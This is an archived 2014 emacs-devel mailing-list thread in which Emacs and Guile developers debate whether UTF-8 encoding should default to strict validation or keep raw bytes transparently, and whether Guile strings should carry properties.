@ 2014-10-07 16:16                                                 ` David Kastrup
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:16 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Richard Stallman writes:
>
>  >     To put it another way, Mark said that Guile is intended to be useful
>  >     writing servers as well as interactive programs.
>  > 
>  > This discussion is about Guile in the context of Emacs specifically.
>  > "What Guile does" generally is a different, though related, topic.
>  > Guile could follow the Unicode spec in normal operation, but offer
>  > another mode that Emacs can use.
>
> It *could*, but it for the default is entirely unclear to me that it
> *should*.  Some use cases, such as AUCTeX parsing error messages from
> TeX (which treats content quoted from the document as bytes, and so
> may slice characters into two invalid byte sequences), will use some
> sort of reversible encoding of raw bytes (the current Emacs encoding
> is one option, of course).  But they can do that explicitly.

Not really.  The terminal/log output will in general reflect the
encoding of the source document and it is human-readable, so you want
the output filter to generally decode as utf-8.  Now TeX may indeed
choose to slice multibyte characters in two (for example, because it
inserts newlines in its output every 79 bytes).  Parsing the error
messages properly requires the ability to reconstruct the input before
the output filter decoded it.  Neither having the output filter pass
everything as bytes (that will make the output generally unfit for human
consumption rather than just in single places) nor "sanitizing" it (that
will make reconstruction of the original context impossible) are
satisfactory here.

The "I know you don't want me to produce anything other than utf-8
anyway" attitude is just getting in the way of such application needs.
Sometimes things are messy, and it must remain the application's choice
how it wants the mess to be dealt with.

> However, in general I think that Emacs should help users who are naive
> about Unicode to avoid emitting invalid Unicode, and so should default
> to querying the user for permission if that were about to happen.  It
> should not silently pass on corrupt input to the output.

You are confusing Emacs with the applications running on it.  It is not
the job of an engine to make the decisions for an application.  In
general, an engine should deal with the problems you tell it to deal
with.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 16:16                                                             ` Andreas Schwab
@ 2014-10-07 16:24                                                               ` David Kastrup
  2014-10-07 16:31                                                                 ` Andreas Schwab
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:24 UTC (permalink / raw)
  To: Andreas Schwab; +Cc: emacs-devel

Andreas Schwab <schwab@suse.de> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> Andreas Schwab <schwab@suse.de> writes:
>>
>>> David Kastrup <dak@gnu.org> writes:
>>>
>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>
>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>
>>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>>> information.  Not making a fuzz might often be simplest.
>>>>>
>>>>> If you try to save a buffer Emacs will check whether all characters are
>>>>> encodable, and complain (and ask) if they aren't.
>>>>
>>>> Sure, but a raw byte is trivially encodable since it is no character.
>>>
>>> This is a contradiction.  It isn't a character, so it isn't encodable.
>>
>> The character representation of "raw byte" is trivially encodable since
>> it represents a single byte in any encoding.
>
> No encoding (except raw-text) can encode characters from the eight-bit
> charset.

(encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)
=> "\200"

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 16:24                                                               ` David Kastrup
@ 2014-10-07 16:31                                                                 ` Andreas Schwab
  2014-10-07 16:52                                                                   ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 16:31 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>
>>> Andreas Schwab <schwab@suse.de> writes:
>>>
>>>> David Kastrup <dak@gnu.org> writes:
>>>>
>>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>>
>>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>>
>>>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>>>> information.  Not making a fuzz might often be simplest.
>>>>>>
>>>>>> If you try to save a buffer Emacs will check whether all characters are
>>>>>> encodable, and complain (and ask) if they aren't.
>>>>>
>>>>> Sure, but a raw byte is trivially encodable since it is no character.
>>>>
>>>> This is a contradiction.  It isn't a character, so it isn't encodable.
>>>
>>> The character representation of "raw byte" is trivially encodable since
>>> it represents a single byte in any encoding.
>>
>> No encoding (except raw-text) can encode characters from the eight-bit
>> charset.
>
> (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)
> => "\200"

That's what you get if you *force* the coding system.  But Emacs will
still complain and ask if you try to save such a buffer.

Andreas.

-- 
Andreas Schwab, SUSE Labs, schwab@suse.de
GPG Key fingerprint = 0196 BAD8 1CE9 1970 F4BE  1748 E4D4 88E3 0EEA B9D7
"And now for something completely different."



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:31                                                     ` Andreas Schwab
  2014-10-07 15:40                                                       ` David Kastrup
@ 2014-10-07 16:34                                                       ` Mark H Weaver
  2014-10-07 17:50                                                         ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07 16:34 UTC (permalink / raw)
  To: Andreas Schwab
  Cc: David Kastrup, Richard Stallman, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Andreas Schwab <schwab@suse.de> writes:

> Mark H Weaver <mhw@netris.org> writes:
>
>> However, if the overlong sequence came from the network, and Emacs
>> propagates it unchanged to internal subsystems[*] (e.g. via command-line
>> arguments to subprocesses), that's not good.  It exposes another program
>> to invalid input -- a program that might not be designed for exposure to
>> possible attacks via overlong encodings.
>
> At least it doesn't make it worse (it is unchanged from the situation if
> you remove Emacs as a filter).

In the case of mere "filtering", you might be right in some cases.

However, the case I'm worried about is where some small piece of the
hostile input is extracted and passed as an argument to another program.
In cases like this it doesn't make sense to think of emacs as a
"filter", and you'd never be able to "remove" it.

It's like saying that a web application that passes unsanitized input to
an SQL query "doesn't make it worse", and that the situation is
unchanged from if you provided public access to the SQL database.

      Mark
     



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 16:31                                                                 ` Andreas Schwab
@ 2014-10-07 16:52                                                                   ` David Kastrup
  2014-10-07 17:38                                                                     ` Andreas Schwab
  2014-10-08  0:47                                                                     ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 16:52 UTC (permalink / raw)
  To: Andreas Schwab; +Cc: emacs-devel

Andreas Schwab <schwab@suse.de> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> Andreas Schwab <schwab@suse.de> writes:
>>
>>> David Kastrup <dak@gnu.org> writes:
>>>
>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>
>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>
>>>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>>>
>>>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>>>
>>>>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>>>>> information.  Not making a fuzz might often be simplest.
>>>>>>>
>>>>>>> If you try to save a buffer Emacs will check whether all characters are
>>>>>>> encodable, and complain (and ask) if they aren't.
>>>>>>
>>>>>> Sure, but a raw byte is trivially encodable since it is no character.
>>>>>
>>>>> This is a contradiction.  It isn't a character, so it isn't encodable.
>>>>
>>>> The character representation of "raw byte" is trivially encodable since
>>>> it represents a single byte in any encoding.
>>>
>>> No encoding (except raw-text) can encode characters from the eight-bit
>>> charset.
>>
>> (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)
>> => "\200"
>
> That's what you get if you *force* the coding system.

It would appear that you are forcing your logic.  "No encoding can ..."
does not mean that.

> But Emacs will still complain and ask if you try to save such a
> buffer.

(let ((coding-system-for-write 'utf-8-unix))
  (with-temp-file "/tmp/bozo"
    (insert(encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8))))

od /tmp/bozo
0000000 000200
0000001

What you mean is that Emacs is asked to _select_ or to _verify_ a coding
system (as is customary for interactive editing of a file) it will do so
and get back to the user when necessary.

But that is _quite_ different from Emacs being _incapable_ of encoding
raw bytes to a file or a stream of a specified encoding.  It means that
when you are using an _application_ that is expected to deliver only
decodable characters, then the _application_ will _ask_ before going
ahead.

But the _engine_ is perfectly capable of going through here.  Once you
confuse engine and application and state "Emacs should not be able to
encode characters from the eight-bit set" rather than "the normal file
saving operation defaulting to using buffer-file-coding-system for
coding-system-for-write after verifying its suitability should ask
before picking a value of coding-system-for-write that cause a file to
be written that is not representable without raw bytes" you are
proposing to cripple Emacs.

Or GUILE.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:15                                                   ` Mark H Weaver
  2014-10-07 15:31                                                     ` Andreas Schwab
@ 2014-10-07 16:59                                                     ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-07 16:59 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Cc: Richard Stallman <rms@gnu.org>,  Eli Zaretskii <eliz@gnu.org>,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Tue, 07 Oct 2014 11:15:05 -0400
> 
> > UTF-8 is defined as not containing "overlong" sequences, so Emacs
> > decodes them into two raw-byte indicating characters, one indicating
> > 0xC0, one indicating 0xA2.  When encoding, it reassembles them into
> > 0xC0 0xA2.
> 
> When editing a file, this is probably the right default behavior,
> although ideally it should warn the user.

It does, when the user modifies the file and then saves it.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 16:52                                                                   ` David Kastrup
@ 2014-10-07 17:38                                                                     ` Andreas Schwab
  2014-10-08  0:47                                                                     ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 17:38 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>
>>> Andreas Schwab <schwab@suse.de> writes:
>>>
>>>> David Kastrup <dak@gnu.org> writes:
>>>>
>>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>>
>>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>>
>>>>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>>>>
>>>>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>>>>
>>>>>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>>>>>> information.  Not making a fuzz might often be simplest.
>>>>>>>>
>>>>>>>> If you try to save a buffer Emacs will check whether all characters are
>>>>>>>> encodable, and complain (and ask) if they aren't.
>>>>>>>
>>>>>>> Sure, but a raw byte is trivially encodable since it is no character.
>>>>>>
>>>>>> This is a contradiction.  It isn't a character, so it isn't encodable.
>>>>>
>>>>> The character representation of "raw byte" is trivially encodable since
>>>>> it represents a single byte in any encoding.
>>>>
>>>> No encoding (except raw-text) can encode characters from the eight-bit
>>>> charset.
>>>
>>> (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)
>>> => "\200"
>>
>> That's what you get if you *force* the coding system.
>
> It would appear that you are forcing your logic.  "No encoding can ..."
> does not mean that.

That's what Emacs told me, with the heuristics you are talking about.

Andreas.

-- 
Andreas Schwab, schwab@linux-m68k.org
GPG Key fingerprint = 58CA 54C7 6D53 942B 1756  01D3 44D5 214B 8276 4ED5
"And now for something completely different."



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 16:34                                                       ` Mark H Weaver
@ 2014-10-07 17:50                                                         ` David Kastrup
  2014-10-07 18:36                                                           ` Mark H Weaver
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 17:50 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> Mark H Weaver <mhw@netris.org> writes:
>>
>>> However, if the overlong sequence came from the network, and Emacs
>>> propagates it unchanged to internal subsystems[*] (e.g. via command-line
>>> arguments to subprocesses), that's not good.  It exposes another program
>>> to invalid input -- a program that might not be designed for exposure to
>>> possible attacks via overlong encodings.
>>
>> At least it doesn't make it worse (it is unchanged from the situation if
>> you remove Emacs as a filter).
>
> In the case of mere "filtering", you might be right in some cases.
>
> However, the case I'm worried about is where some small piece of the
> hostile input is extracted and passed as an argument to another program.
> In cases like this it doesn't make sense to think of emacs as a
> "filter", and you'd never be able to "remove" it.
>
> It's like saying that a web application that passes unsanitized input to
> an SQL query "doesn't make it worse", and that the situation is
> unchanged from if you provided public access to the SQL database.

If GUILE or Emacs is supposed to sanitize input, you tell it to sanitize
input.  That's different from GUILE/Emacs deciding over your head what
is good for your application.

Again, confusing the responsibilities and capabilities of an engine from
those of an application is sure to lead to mismatches between
requirements and capabilities.  An engine has to work.  Not just given
certain circumstances, but always.  Anything else is a recipe for
trouble.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 16:01                                                 ` David Kastrup
@ 2014-10-07 18:15                                                   ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07 18:15 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

David Kastrup writes:

 > I repeat: that is to be the choice of the application rather than
 > the engine.

Which is what *I* said.

But the engine *should* have a default for convenience of at least
some use cases.  What Mark (AFAICS) and I want is to default to not
emitting broken Unicode.  If the application chooses to do so, it
should do so explicitly.

 > "We know better than the application writer what he wants" is
 > rarely going to work to the satisfaction of all.

Again, I've said that in this thread already.

Finally, note that there's nothing nonconformant about rawbytes in the
internal representation per se.  The Unicode standard is for
*interchange* and says nothing about Emacs buffers.  If TeX is
produces invalid UTF-8 and AUCTeX accepts that and converts invalid
UTF-8 to rawbytes, that's not a problem -- everybody knows what is
going on -- and conformance is a non-issue, since it's all internal.
(I don't claim Mark agrees with this paragraph.  And he probably
doesn't for the applications he envisions, because they are modular
(where Emacs is monolithic), and therefore strings in internal
representation are passed across module boundaries.)

But Emacs should not save that buffer to a file or send its contents
to a network stream, without either explicit permission from the user,
or explicit configuration of the output stream by the application.

Autosaves are another thorny problem.  I suppose they will be handled
by declaring them conformant only to Emacs' needs.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 15:40                                                       ` David Kastrup
@ 2014-10-07 18:32                                                         ` Stephen J. Turnbull
  2014-10-07 18:41                                                           ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07 18:32 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Mark H Weaver, Eli Zaretskii

David Kastrup writes:

 > Just bombing out in some predetermined manner in some fixed location is
 > not a substitute for properly planned behavior.

Nobody proposed that, so please stop arguing against it.

 > Unless told differently, a tool like GUILE or Emacs, when used as a
 > filter, should do exactly _those_ filtering operations you tell it.

Right.  All Mark and I want is to default safely.  Ie, if you invoke an
encoding named "utf-8", you get strictly conformant output.

When Emacs is being used as a filter, you just have to use the
'utf-8-with-rawbytes coding system, and when Emacs is being used for
what is presumably valid text, you use the 'utf-8 coding system.  IOW,
it's use of the *-with-rawbytes coding systems that turns Emacs into a
filter.

I think that is way preferable to the alternative where 'utf-8 gives
rawbytes, and you have to use 'utf-8-strict to get validation.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 17:50                                                         ` David Kastrup
@ 2014-10-07 18:36                                                           ` Mark H Weaver
  2014-10-07 18:56                                                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07 18:36 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

David Kastrup <dak@gnu.org> writes:

> Mark H Weaver <mhw@netris.org> writes:
>
>> Andreas Schwab <schwab@suse.de> writes:
>>
>>> Mark H Weaver <mhw@netris.org> writes:
>>>
>>>> However, if the overlong sequence came from the network, and Emacs
>>>> propagates it unchanged to internal subsystems[*] (e.g. via command-line
>>>> arguments to subprocesses), that's not good.  It exposes another program
>>>> to invalid input -- a program that might not be designed for exposure to
>>>> possible attacks via overlong encodings.
>>>
>>> At least it doesn't make it worse (it is unchanged from the situation if
>>> you remove Emacs as a filter).
>>
>> In the case of mere "filtering", you might be right in some cases.
>>
>> However, the case I'm worried about is where some small piece of the
>> hostile input is extracted and passed as an argument to another program.
>> In cases like this it doesn't make sense to think of emacs as a
>> "filter", and you'd never be able to "remove" it.
>>
>> It's like saying that a web application that passes unsanitized input to
>> an SQL query "doesn't make it worse", and that the situation is
>> unchanged from if you provided public access to the SQL database.
>
> If GUILE or Emacs is supposed to sanitize input, you tell it to sanitize
> input.  That's different from GUILE/Emacs deciding over your head what
> is good for your application.

I've already said more than once that I agree Guile and Emacs should
provide the *option* to handle invalid byte sequences transparently, if
explicitly requested to do so, and furthermore that this is appropriate
default behavior when editing files.

What I'm saying is that in most other cases, the codecs should be
strict, and therefore this should be the default behavior of the
underlying functions.  When users call an Emacs function to decode
UTF-8, it should report an error if that input isn't actually UTF-8.
Conversely, when encoding UTF-8, the output should be UTF-8 and not some
arbitrary byte sequence.

Relying on users to explicitly sanitize the result of decoding UTF-8 to
check for "raw bytes", and to explicitly check for "raw bytes" before
encoding UTF-8 (as if that term didn't already have a well-known meaning
that excludes arbitrary byte sequences) is a recipe for security holes.

       Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 18:32                                                         ` Stephen J. Turnbull
@ 2014-10-07 18:41                                                           ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 18:41 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Mark H Weaver, Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > Just bombing out in some predetermined manner in some fixed location is
>  > not a substitute for properly planned behavior.
>
> Nobody proposed that, so please stop arguing against it.
>
>  > Unless told differently, a tool like GUILE or Emacs, when used as a
>  > filter, should do exactly _those_ filtering operations you tell it.
>
> Right.  All Mark and I want is to default safely.  Ie, if you invoke an
> encoding named "utf-8", you get strictly conformant output.
>
> When Emacs is being used as a filter, you just have to use the
> 'utf-8-with-rawbytes coding system, and when Emacs is being used for
> what is presumably valid text, you use the 'utf-8 coding system.  IOW,
> it's use of the *-with-rawbytes coding systems that turns Emacs into a
> filter.
>
> I think that is way preferable to the alternative where 'utf-8 gives
> rawbytes, and you have to use 'utf-8-strict to get validation.

Emacs' current behavior where the low-level operations _obey_ _without_
_asking_ is quite preferable.  Again, you want to have the engine's
responsibilities confused with the application's responsibilities.  And
that means that you generally have to work around the engine for getting
basic work done.  And figure out just where in the operating layers you
have to apply overrides in order to get "don't mess with this"
semantics.

Since verification is best applied at a single place in an application,
being denied control over that place whenever you don't have _every_
_single_ _layer_ under your own control is a nuisance.

I am glad that Emacs does not get in my hair as an application
programmer like that, and it would be doubly appropriate for GUILE not
to do that.  GUILE is supposed to be an extension language and system.
As such, it should not try governing how an application is organizing
its verification processes.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 18:36                                                           ` Mark H Weaver
@ 2014-10-07 18:56                                                             ` David Kastrup
  2014-10-07 19:21                                                               ` Stephen J. Turnbull
  2014-10-07 23:11                                                               ` Mark H Weaver
  0 siblings, 2 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 18:56 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> Relying on users to explicitly sanitize the result of decoding UTF-8
> to check for "raw bytes", and to explicitly check for "raw bytes"
> before encoding UTF-8 (as if that term didn't already have a
> well-known meaning that excludes arbitrary byte sequences) is a recipe
> for security holes.

You are calling "application programmers" here "users" and call them
incapable of designing their application.  Any application in need of
sanitizing will not stop in its requirements at UTF-8 sanitization.

You cannot successfully cater for clueless application programmers.  And
nobody says that GUILE should _crash_ when provided non-sanitized UTF-8.
It has to be able to deal with everything thrown at it.  And you want it
to _not_ do that by default.  That means that _any_ programmer wanting
to do his own verification will not be able to use _any_ module provided
by someone else which does not explicitly override the defaults, since
then modules he has no control over will refuse cooperating.

GUILE is an extension language and system.  It should _not_ do policing.
Every attempt at policing makes it impossible to design the policing
into the place where it makes sense.

Worse, it leads to sloppy code since then people start to consider an
internal UTF-8 based encoding to be identical to an external UTF-8
encoding, making it _impossible_ to design byte-transparent workflows.

That is the current state of GUILE 2, and as an application programmer
I can testify that it is a huge headache.  Both in practice as well as
conceptually.

I am glad that Emacs started its history with a multibyte encoding
incompatible with any external encoding since that has given it lots of
impetus to get that distinction right.

With the "we don't want to cater for raw bytes by default" attitude
you'll never get away in a reasonably reliable manner from the "our code
will not deal with raw bytes" situation you have now with regard to
string manipulation.

It took Emacs years to get this into a really reliable and good state,
with many more active users of multibyte character sets than GUILE has.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 18:56                                                             ` David Kastrup
@ 2014-10-07 19:21                                                               ` Stephen J. Turnbull
  2014-10-07 23:11                                                               ` Mark H Weaver
  1 sibling, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07 19:21 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

David Kastrup writes:

 > With the "we don't want to cater for raw bytes by default" attitude
 > you'll never get away in a reasonably reliable manner from the "our code
 > will not deal with raw bytes" situation you have now with regard to
 > string manipulation.

If Emacs and Emacs Lisp developers never can make it work, I think
that says more about Emacs than about the concept of standards-based
program design.  I'm sure the Guile community will succeed as Python
did.

It took Python about 3 months to implement PEP 383, another 6 to
actually publicly release a Python using it, and no, Python has never
defaulted to anything but strict error handling ("crash and traceback
on invalid input") since.

Nobody complains, because in practice strict is almost good enough for
interactive programs (ask the user to clean up the input and resubmit),
and the few who do need rawbytes are perfectly happy writing

  stream = open(filename, 'r', encoding='utf-8', errors='surrogateescape')

when it's needed.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 18:56                                                             ` David Kastrup
  2014-10-07 19:21                                                               ` Stephen J. Turnbull
@ 2014-10-07 23:11                                                               ` Mark H Weaver
  2014-10-08  3:03                                                                 ` David Kastrup
  2014-10-11 18:50                                                                 ` Florian Weimer
  1 sibling, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07 23:11 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

David Kastrup <dak@gnu.org> writes:
> You cannot successfully cater for clueless application programmers.

It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.

     Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 14:14                                                 ` David Kastrup
       [not found]                                                   ` <"<83y4srjaot.fsf"@gnu.org>
  2014-10-07 15:15                                                   ` Mark H Weaver
@ 2014-10-08  0:47                                                   ` Richard Stallman
  2014-10-08  7:13                                                     ` Eli Zaretskii
  2014-10-09  7:36                                                     ` David Kastrup
  2 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-08  0:47 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    UTF-8 is defined as not containing "overlong" sequences, so Emacs
    decodes them into two raw-byte indicating characters, one indicating
    0xC0, one indicating 0xA2.  When encoding, it reassembles them into
    0xC0 0xA2.

In that case, it might be reasonable to ask the user whether to accept
a UTF-8 file decoding that contains any raw-byte characters.

What do people think of this?

    One problem with that is that quite often Emacs' choice of a coding
    system for a buffer is the result of heuristics rather than dependable
    information.  Not making a fuzz might often be simplest.

Could you explain what "fuzz" means here?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 16:52                                                                   ` David Kastrup
  2014-10-07 17:38                                                                     ` Andreas Schwab
@ 2014-10-08  0:47                                                                     ` Richard Stallman
  2014-10-08  7:19                                                                       ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-08  0:47 UTC (permalink / raw)
  To: David Kastrup; +Cc: schwab, emacs-devel

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    What you mean is that Emacs is asked to _select_ or to _verify_ a coding
    system (as is customary for interactive editing of a file) it will do so
    and get back to the user when necessary.

    But that is _quite_ different from Emacs being _incapable_ of encoding
    raw bytes to a file or a stream of a specified encoding.  It means that
    when you are using an _application_ that is expected to deliver only
    decodable characters, then the _application_ will _ask_ before going
    ahead.

    But the _engine_ is perfectly capable of going through here.

I think that both of these are points correct.  But there is still the
question of what the engine should do by default.

We can set the defaults for those non-frile interfaces so as to reject
invalid UTF-8 sequences.  Then a program could specify to override the
default and allow them.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06  3:34                                       ` Stephen J. Turnbull
@ 2014-10-08  0:48                                         ` Richard Stallman
  2014-10-08  2:09                                           ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-08  0:48 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

     > Given a self-contained Scheme program, it should be easy to determine
     > whether it ever examines or sets string text properties.  Is that enough
     > to provide the same "security" benefits in practice?

    No.  Often systems are constructed by assembling separately developed
    modules.  If a "security" module responsible for checking data
    validity is property-oblivious, then maliciously crafted properties
    may be able to cause "evil" behavior in a property-sensitive module
    supposedly protected by the "security" module.

I don't understand what sort of danger you're worried about.
Can you present a concrete scenario?

    You can impugn the skills of the programmers responsible,

That comes from you, not from me.

							      or say it's
    all very hypothetical

It is all very abstract as well as hypothetical.

If you want to convince me that this is a problem, you need to present
sufficient arguments to outweigh the very clear problem that would be
caused by NOT adding property lists to strings.  You need to convice me
that it makes sense to try to prevent communication between two
Scheme programs in the same process.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  0:48                                         ` Richard Stallman
@ 2014-10-08  2:09                                           ` Stephen J. Turnbull
  2014-10-08  3:07                                             ` David Kastrup
  2014-10-09  1:19                                             ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-08  2:09 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > If you want to convince me that [a property list vector for
 > implicitly transmitting information across module boundaries] is a
 > problem,

I'm not trying to convince you; your evidentiary requirements are way
too high for me to satisfy in time available.

I just want to make sure that Emacs developers in general are aware
that if string properties are added to Guile itself, Emacs will be a
potential vector for attacks.  For example, by providing a "back
channel" for malicious information if Emacs is used to develop a
management interface for a web service written in Guile which directly
accesses Guile modules used in the web service.

 > you need to present sufficient arguments to outweigh the very clear
 > problem that would be caused by NOT adding property lists to
 > strings.

You misunderstand me.  Emacs obviously needs property lists on
strings.  Nobody in their right mind would suggest otherwise.

What I advocate is that string properties should be implemented by
using Guile facilities for defining types, not by changing Guile.
External modules that want to use Emacs property lists for whatever
reason can explicitly import that interface from Emacs.  However,
those properties should not be passed to non-Emacs modules implicitly.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
